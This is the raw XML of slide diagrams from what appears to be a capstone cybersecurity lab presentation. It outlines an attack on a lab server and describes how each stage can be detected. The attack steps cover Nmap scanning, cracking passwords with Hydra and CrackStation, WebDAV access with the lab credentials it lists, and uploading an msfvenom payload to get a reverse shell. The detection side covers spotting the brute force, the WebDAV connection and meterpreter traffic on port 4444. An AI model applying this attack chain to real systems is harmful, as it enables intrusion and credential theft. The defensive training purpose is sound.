      </a:schemeClr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98090D1-62AC-4CC5-8551-0CD20637618F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CA3B37-F1B4-48C2-8EE7-3120BF5243E6}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Alarms: Setting Alerts for Better Response Time</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFEFCC6D-C123-4C25-A6B9-0551661B3D11}" type="parTrans" cxnId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}" type="sibTrans" cxnId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Mitigation: Finding the Request for the Hidden Directory</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F1BFA5C-E8C3-41D4-8257-97E03AFD5D37}" type="parTrans" cxnId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4587CD84-8CDF-4B8A-AF09-948DE0759811}" type="sibTrans" cxnId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{311065C5-C7C0-43F4-8144-456E680D03E2}" type="pres">
      <dgm:prSet presAssocID="{398090D1-62AC-4CC5-8551-0CD20637618F}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" type="pres">
      <dgm:prSet presAssocID="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E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CD002B5-AC36-4ED2-AD33-72653509322D}" type="pres">
      <dgm:prSet presAssocID="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" type="pres">
      <dgm:prSet presAssocID="{586B2209-4AA5-4065-B0B1-54919DBACC8D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3DD55002-E983-4268-9BAB-0DB66DE2B0D3}" type="presOf" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{311065C5-C7C0-43F4-8144-456E680D03E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}" srcOrd="0" destOrd="0" parTransId="{CFEFCC6D-C123-4C25-A6B9-0551661B3D11}" sibTransId="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}"/>
    <dgm:cxn modelId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}" srcOrd="1" destOrd="0" parTransId="{3F1BFA5C-E8C3-41D4-8257-97E03AFD5D37}" sibTransId="{4587CD84-8CDF-4B8A-AF09-948DE0759811}"/>
    <dgm:cxn modelId="{74C84023-77E1-4842-9912-BBA36F0AA399}" type="presOf" srcId="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}" destId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{656E5EFB-7074-4B30-AEC8-EB858C8CA4E9}" type="presOf" srcId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}" destId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F3DCBF83-D586-4C79-937A-0DD6A840C031}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9F737322-94DB-4FE4-9744-8593AA2E6458}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{BCD002B5-AC36-4ED2-AD33-72653509322D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{47225059-E07F-4780-B0C0-FADE6FDE7641}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300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C0E779-8552-445C-9B9B-27DD3DCC936A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="583840"/>
          <a:ext cx="6795915" cy="838451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latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>In the Kali Machine : use Nmap to find the open ports</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="40930" y="624770"/>
        <a:ext cx="6714055" cy="756591"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8213466B-98D9-42B9-9CB5-C83CB6D5DAF2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1482772"/>
          <a:ext cx="6795915" cy="838451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87321"/>
                <a:satOff val="-1564"/>
                <a:lumOff val="664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87321"/>
                <a:satOff val="-1564"/>
                <a:lumOff val="664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87321"/>
                <a:satOff val="-1564"/>
                <a:lumOff val="664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Take the results from the Nmap scan and open a browser to the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200">
              <a:latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200"/>
            <a:t> address of the capstone machine and port eighty.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="40930" y="1523702"/>
        <a:ext cx="6714055" cy="756591"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C42F2417-5D4F-4B80-B5CC-96E6A590A26A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2381703"/>
          <a:ext cx="6795915" cy="838451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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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Use the contents of what you find on the web server to crack Ashton's password.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="40930" y="2422633"/>
        <a:ext cx="6714055" cy="756591"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7BC75A77-D2FE-47DF-AF1C-C00BF9693734}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3280634"/>
          <a:ext cx="6795915" cy="838451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261962"/>
                <a:satOff val="-4692"/>
                <a:lumOff val="1993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261962"/>
                <a:satOff val="-4692"/>
                <a:lumOff val="1993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261962"/>
                <a:satOff val="-4692"/>
                <a:lumOff val="1993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Use Hydra to crack Ashton's password.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="40930" y="3321564"/>
        <a:ext cx="6714055" cy="756591"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{36F4812C-AB44-4145-B6E4-ED6CD65A2C5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4179565"/>
          <a:ext cx="6795915" cy="838451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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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Once Hydra has cracked Ashton's password use it to login to his account on the server.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="40930" y="4220495"/>
        <a:ext cx="6714055" cy="7565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18032D-7683-4919-91BB-00D5EECE15A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="160599"/>
          <a:ext cx="6582555" cy="1154789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latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>On the Web Server-Information found in the folder "connect_to_corp_server" will give instructions on how to access the corporate server. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="56372" y="216971"/>
        <a:ext cx="6469811" cy="1042045"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1375869"/>
          <a:ext cx="6582555" cy="1154789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116428"/>
                <a:satOff val="-2085"/>
                <a:lumOff val="886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116428"/>
                <a:satOff val="-2085"/>
                <a:lumOff val="886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116428"/>
                <a:satOff val="-2085"/>
                <a:lumOff val="886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latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>Using Crackstation.net : Ryan's hash can be cracked to find the password.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="56372" y="1432241"/>
        <a:ext cx="6469811" cy="1042045"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B5764351-1465-4EC1-AA94-7161171EB54E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2591139"/>
          <a:ext cx="6582555" cy="1154789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232855"/>
                <a:satOff val="-4171"/>
                <a:lumOff val="1772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232855"/>
                <a:satOff val="-4171"/>
                <a:lumOff val="1772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232855"/>
                <a:satOff val="-4171"/>
                <a:lumOff val="1772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latin typeface="Avenir Next LT Pro Light"/>
            </a:rPr>
            <a:t>Once connected to the WebDav server : use Ryan's credentials to gain access to the corporate server.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="56372" y="2647511"/>
        <a:ext cx="6469811" cy="1042045"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5942610E-AD9E-4FD2-9023-9542A85A3CC8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3806409"/>
          <a:ext cx="6582555" cy="1154789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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>Use the Kali Machine and the msfvenom tool to create a  payload to inject into the webserver.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="56372" y="3862781"/>
        <a:ext cx="6469811" cy="10420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E05B8E-A567-41BA-906C-C2BEDE7B260D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="258510"/>
          <a:ext cx="6388242" cy="1044809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Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>Based on our earlier investigation, we know that Ashton, an employee of the company. We must assume ashton is the username. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="51003" y="309513"/>
        <a:ext cx="6286236" cy="942803"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{109B8A15-4B16-45E6-8605-948B16D246EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1358040"/>
          <a:ext cx="6388242" cy="1044809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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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Avenir Next LT Pro Light"/>
            </a:rPr>
            <a:t>Using Ashton's credentials, ashton:leopoldo, we were able to successfully access the hidden directory. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="51003" y="1409043"/>
        <a:ext cx="6286236" cy="942803"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{385128CF-23E0-44A4-B6B5-8A036D471549}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2457570"/>
          <a:ext cx="6388242" cy="1044809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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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Avenir Next LT Pro Light"/>
            </a:rPr>
            <a:t>Inside the hidden directory is another file labeled connect_to_corp_server, which  contains instructions to access to corporate server through Ryan's account. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="51003" y="2508573"/>
        <a:ext cx="6286236" cy="9428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0C4630-E365-428B-84EB-78CA73546584}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1787"/>
          <a:ext cx="3803904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8F5F184-20E5-44DF-B99F-95404369E9FA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1787"/>
          <a:ext cx="3803904" cy="6094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Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>Ryan's password is protected as a hash value. Using Crack Station, we determined Ryan's password is linux4u.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1787"/>
        <a:ext cx="3803904" cy="609435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ADC94420-F6CD-486E-BE34-9167D6217C71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="611222"/>
          <a:ext cx="3803904" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1351709"/>
                <a:satOff val="-3484"/>
                <a:lumOff val="-2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351709"/>
                <a:satOff val="-3484"/>
                <a:lumOff val="-2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351709"/>
                <a:satOff val="-3484"/>
                <a:lumOff val="-2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1351709"/>
              <a:satOff val="-3484"/>
              <a:lumOff val="-235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DE55A3D-0CD0-4C04-B6D9-145AB3505FFD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="611222"/>
          <a:ext cx="3803904" cy="6094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Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>Following the directions, we connected to the corporate server by inputting the following in the Connect to Server box in the Other Locations folder:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="611222"/>
        <a:ext cx="3803904" cy="609435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A025D881-9505-4059-ACAF-A2DE774A722E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1220657"/>
          <a:ext cx="3803904" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-2703417"/>
                <a:satOff val="-6968"/>
                <a:lumOff val="-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703417"/>
                <a:satOff val="-6968"/>
                <a:lumOff val="-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703417"/>
                <a:satOff val="-6968"/>
                <a:lumOff val="-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2703417"/>
              <a:satOff val="-6968"/>
              <a:lumOff val="-470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D1F8E8C-A927-4315-9E73-90428D660C69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1220657"/>
          <a:ext cx="3803904" cy="6094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Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>dav://192.168.1.105/webdav </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1220657"/>
        <a:ext cx="3803904" cy="609435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BF56476-60E6-4982-AD34-D5E50FCDF9E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1830092"/>
          <a:ext cx="3803904" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4055126"/>
                <a:satOff val="-10451"/>
                <a:lumOff val="-705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055126"/>
                <a:satOff val="-10451"/>
                <a:lumOff val="-705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055126"/>
                <a:satOff val="-10451"/>
                <a:lumOff val="-705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4055126"/>
              <a:satOff val="-10451"/>
              <a:lumOff val="-705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E5BD107-29B5-4CF7-B252-35D37DC982B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1830092"/>
          <a:ext cx="3803904" cy="6094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Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>Using Ryan's credentials, ryan:linux4u, we successfully accessed the corporate directory. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1830092"/>
        <a:ext cx="3803904" cy="609435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E572E846-9D11-4650-8FAD-20FE17BDE2AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2439527"/>
          <a:ext cx="3803904" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5406834"/>
                <a:satOff val="-13935"/>
                <a:lumOff val="-941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406834"/>
                <a:satOff val="-13935"/>
                <a:lumOff val="-941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406834"/>
                <a:satOff val="-13935"/>
                <a:lumOff val="-941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5406834"/>
              <a:satOff val="-13935"/>
              <a:lumOff val="-941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F9BA28B-3190-4F11-99F6-9673DC774612}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2439527"/>
          <a:ext cx="3803904" cy="6094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Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>With this access established, we know that we can upload a file directly to the corporate server's filesystem, which can be exploited to force the web application to run an unintended script.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2439527"/>
        <a:ext cx="3803904" cy="609435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBC5869-F625-44D2-AB73-7DB8E1D7A89D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3048962"/>
          <a:ext cx="3803904" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line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E8545E-34B7-46B9-9AA2-AEB06D8951EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3048962"/>
          <a:ext cx="3803904" cy="6094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Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>We exploited this vulnerability to create persistence through a reverse shell.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3048962"/>
        <a:ext cx="3803904" cy="6094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18032D-7683-4919-91BB-00D5EECE15A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1080124"/>
          <a:ext cx="6949783" cy="647595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latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Identify the initial offensive traffic </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="1111737"/>
        <a:ext cx="6886557" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1805479"/>
          <a:ext cx="6949783" cy="647595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87321"/>
                <a:satOff val="-1564"/>
                <a:lumOff val="664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87321"/>
                <a:satOff val="-1564"/>
                <a:lumOff val="664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87321"/>
                <a:satOff val="-1564"/>
                <a:lumOff val="664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latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>  Find the request for the hidden directory </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="1837092"/>
        <a:ext cx="6886557" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5942610E-AD9E-4FD2-9023-9542A85A3CC8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2530834"/>
          <a:ext cx="6949783" cy="647595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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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174641"/>
                <a:satOff val="-3128"/>
                <a:lumOff val="1329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latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Identify the brute force attack</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="2562447"/>
        <a:ext cx="6886557" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{512D50A6-3596-4293-AD12-2EB674231B42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3256190"/>
          <a:ext cx="6949783" cy="647595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261962"/>
                <a:satOff val="-4692"/>
                <a:lumOff val="1993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261962"/>
                <a:satOff val="-4692"/>
                <a:lumOff val="1993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261962"/>
                <a:satOff val="-4692"/>
                <a:lumOff val="1993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latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Find the webdav connection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="3287803"/>
        <a:ext cx="6886557" cy="584369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{74A336DF-98A3-471E-A724-5BB8C35806C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3981545"/>
          <a:ext cx="6949783" cy="647595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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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349283"/>
                <a:satOff val="-6256"/>
                <a:lumOff val="2658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latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Identify the meterpreter traffic</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31613" y="4013158"/>
        <a:ext cx="6886557" cy="58436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505FE2-C851-4343-AB8B-B52CCDCB8E34}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="768" y="26309"/>
          <a:ext cx="2998777" cy="179926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>
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>source.ip : 192.168.1.105 </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="768" y="26309"/>
        <a:ext cx="2998777" cy="1799266"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DBB1D68D-2F38-4D7F-B541-EF7CC38372FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3300193" y="13714"/>
          <a:ext cx="2998777" cy="179926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err="1">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>destination.port</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3000" kern="1200">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> : 4444</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3300193" y="13714"/>
        <a:ext cx="2998777" cy="179926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18032D-7683-4919-91BB-00D5EECE15A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="21549"/>
          <a:ext cx="6582555" cy="24745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>
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Alarms: Setting Alerts for Better Response Time</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
